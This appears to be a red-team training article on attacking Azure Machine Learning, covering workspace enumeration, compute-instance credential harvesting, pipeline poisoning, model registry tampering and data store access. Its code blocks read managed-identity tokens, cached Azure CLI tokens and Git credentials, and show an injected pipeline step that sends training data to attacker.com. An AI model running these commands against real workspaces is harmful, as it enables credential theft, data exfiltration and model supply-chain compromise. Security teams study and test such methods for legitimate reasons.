Azure ML Exploitation

advanced10 min readUpdated 2026-03-15

Red team attack methodology for Azure Machine Learning: workspace security, compute instance attacks, pipeline poisoning, model registry tampering, and data store exploitation.

azure azure-ml workspace-security compute-attacks pipeline-poisoning model-registry data-store red-team

Azure ML Exploitation

Azure Machine Learning is Microsoft's enterprise ML platform providing managed compute, experimentation tracking, automated ML, model deployment, and MLOps pipelines. From a red team perspective, Azure ML workspaces are high-value targets because they aggregate access to sensitive data, trained models, compute resources, and credentials for external services. A compromised workspace often provides paths to both the ML pipeline and the broader Azure environment.

Workspace Security

Workspace Architecture

An Azure ML workspace is associated with several dependent Azure resources:

Resource	Purpose	Attack Relevance
Azure Storage Account	Default data store for experiments, models, snapshots	Training data access, model artifact theft
Azure Key Vault	Credential storage for workspace secrets	API keys, connection strings, certificates
Azure Container Registry	Docker images for training and deployment	Container image tampering, supply chain attacks
Application Insights	Telemetry and monitoring	Log access, operational intelligence

# Get workspace details and associated resources
az ml workspace show --name <ws> --resource-group <rg> \
  --query "{storage:storage_account, keyVault:key_vault, acr:container_registry}"
 
# List workspace connections (may contain credentials)
az ml connection list --workspace-name <ws> --resource-group <rg>

RBAC Exploitation

Azure ML uses several built-in roles with different privilege levels:

Role	Capabilities	Red Team Interest
`AzureML Data Scientist`	Run experiments, deploy models, access compute	Training pipeline access, model deployment
`AzureML Compute Operator`	Manage compute resources	Create compute for credential theft
`Contributor` on workspace	Full workspace management	All workspace operations including connections
`Reader` on workspace	View workspace contents	Enumerate assets, view experiment logs

Compute Instance Attacks

Compute as a Pivot Point

Azure ML compute instances are managed VMs with Jupyter, VS Code, and terminal access. They function similarly to SageMaker notebook instances as pivot points for lateral movement.

# List compute instances
az ml compute list --workspace-name <ws> --resource-group <rg> --type ComputeInstance
 
# Get compute details
az ml compute show --name <compute> --workspace-name <ws> --resource-group <rg>
 
# Access via workspace (creates access URL)
# Navigate to Azure ML Studio > Compute > Instances > Connect

Credential Harvesting

From a compromised compute instance:

# Managed identity token for Azure management
curl -H "Metadata: true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
 
# Managed identity token for storage access
curl -H "Metadata: true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://storage.azure.com/"
 
# Check for cached Azure CLI credentials
cat ~/.azure/accessTokens.json 2>/dev/null
cat ~/.azure/msal_token_cache.json 2>/dev/null
 
# Check environment variables for credentials
env | grep -i -E "(key|secret|password|token|connection)"
 
# Check for Git credentials (common on data science instances)
cat ~/.git-credentials 2>/dev/null
git config --global credential.helper

Startup Script Attacks

Azure ML compute instances support setup scripts that run on creation. If modifiable, these scripts provide persistence:

# Check if the compute has a setup script
az ml compute show --name <compute> --workspace-name <ws> --resource-group <rg> \
  --query "setup_scripts"

Shared Compute Risks

When multiple data scientists share a workspace, compute instances may be accessible to other workspace users depending on configuration:

SSH access: If SSH is enabled, other workspace users with the SSH key can access the instance
Shared file systems: Workspace-level file shares may be mounted across compute instances
Terminal access: Workspace contributors can access terminal sessions on any compute instance in the workspace

Pipeline Poisoning

Pipeline Architecture

Azure ML pipelines define multi-step ML workflows: data preprocessing, feature engineering, model training, evaluation, and deployment. Pipelines are defined as code (Python SDK or YAML) and executed on workspace compute.

Attack Vectors

Pipeline definition tampering

Modify pipeline definitions to inject malicious steps. If pipeline code is stored in a connected Git repository, compromise the repository to modify pipeline logic.

# Injected pipeline step that exfiltrates training data
- name: exfiltrate_data
  command: >
    curl -X POST https://attacker.com/collect
    -d @${{inputs.training_data}}
  environment: azureml:default-env:1
  compute: azureml:cpu-cluster

Environment manipulation

Azure ML environments define the software dependencies for pipeline steps. Tampering with environment definitions allows dependency injection:

# List environments
az ml environment list --workspace-name <ws> --resource-group <rg>
 
# Register a modified environment with malicious packages
az ml environment create --file modified-env.yml \
  --workspace-name <ws> --resource-group <rg>

Component substitution
Azure ML pipelines use reusable components. Registering a malicious component with the same name (but a newer version) causes pipelines to pick up the tampered version on their next execution.
Schedule manipulation
Pipelines can run on schedules. Modifying a schedule to trigger a poisoned pipeline at a specific time allows timed attacks:
# List schedules az ml schedule list --workspace-name <ws> --resource-group <rg>

Model Registry Tampering

Registry Structure

The Azure ML model registry stores model versions with metadata, lineage tracking, and deployment state. It serves as the source of truth for which model versions are deployed to production endpoints.

# List registered models
az ml model list --workspace-name <ws> --resource-group <rg>
 
# Get model details including artifact location
az ml model show --name <model> --version <ver> \
  --workspace-name <ws> --resource-group <rg>

Tampering Techniques

Technique	Method	Impact
Version injection	Register a new version of an existing model with tampered artifacts	Next deployment picks up backdoored model
Artifact replacement	Modify model files in the backing storage account	Deployed model serves attacker-controlled predictions
Metadata manipulation	Change model tags or properties to influence selection	Automated pipelines deploy the wrong model
Lineage spoofing	Register models with fabricated experiment lineage	Bypass provenance checks

Deployment Hijacking

Azure ML supports managed online endpoints (fully managed) and Kubernetes online endpoints (customer-managed AKS):

# List online endpoints
az ml online-endpoint list --workspace-name <ws> --resource-group <rg>
 
# Get endpoint details
az ml online-endpoint show --name <endpoint> \
  --workspace-name <ws> --resource-group <rg>
 
# List deployments within an endpoint
az ml online-deployment list --endpoint-name <endpoint> \
  --workspace-name <ws> --resource-group <rg>

Deployment hijacking: update an existing deployment to point to a tampered model version, or modify traffic routing to send requests to an attacker-controlled deployment.

Data Store Exploitation

Data Store Architecture

Azure ML data stores are abstractions over Azure storage services. They store credentials or use managed identity to access underlying storage:

# List data stores
az ml datastore list --workspace-name <ws> --resource-group <rg>
 
# Get data store details (may reveal storage account names, container names)
az ml datastore show --name <datastore> \
  --workspace-name <ws> --resource-group <rg>

Credential Extraction

Data stores can authenticate using:

Account keys: Stored in the workspace Key Vault
SAS tokens: Time-limited but may have broad scope
Managed identity: Workspace identity with storage access
Service principal: Application credentials stored in Key Vault

# Access Key Vault secrets (if workspace identity or user has access)
az keyvault secret list --vault-name <vault>
az keyvault secret show --vault-name <vault> --name <secret>

Data Access Through Workspace Identity

The workspace's managed identity typically has Storage Blob Data Contributor or Storage Blob Data Reader on connected storage accounts. From a compromised compute instance:

from azure.identity import ManagedIdentityCredential
from azure.storage.blob import BlobServiceClient
 
credential = ManagedIdentityCredential()
blob_service = BlobServiceClient(
    account_url="https://<storage>.blob.core.windows.net",
    credential=credential
)
 
# List containers and blobs
for container in blob_service.list_containers():
    print(f"Container: {container.name}")
    container_client = blob_service.get_container_client(container.name)
    for blob in container_client.list_blobs():
        print(f"  Blob: {blob.name}")

Azure AI Services Overview -- Service landscape and enumeration
Azure OpenAI Attack Surface -- Azure OpenAI-specific attacks
Defender for AI Bypass -- Evading detection during exploitation
SageMaker Exploitation -- Comparable AWS ML platform attacks

Knowledge Check

You have the AzureML Data Scientist role on a workspace. Which of the following can you NOT do?

Knowledge Check

Why is Azure ML pipeline poisoning particularly difficult to detect?

References

Azure ML Security -- Enterprise security documentation
Azure ML RBAC -- Role-based access control
Azure ML Data Stores -- Data store configuration

Azure ML Exploitation

Pipeline definition tampering

Environment manipulation

Component substitution

Schedule manipulation

Related articles

Azure ML Exploitation

Pipeline definition tampering

Environment manipulation

Component substitution

Schedule manipulation

Related articles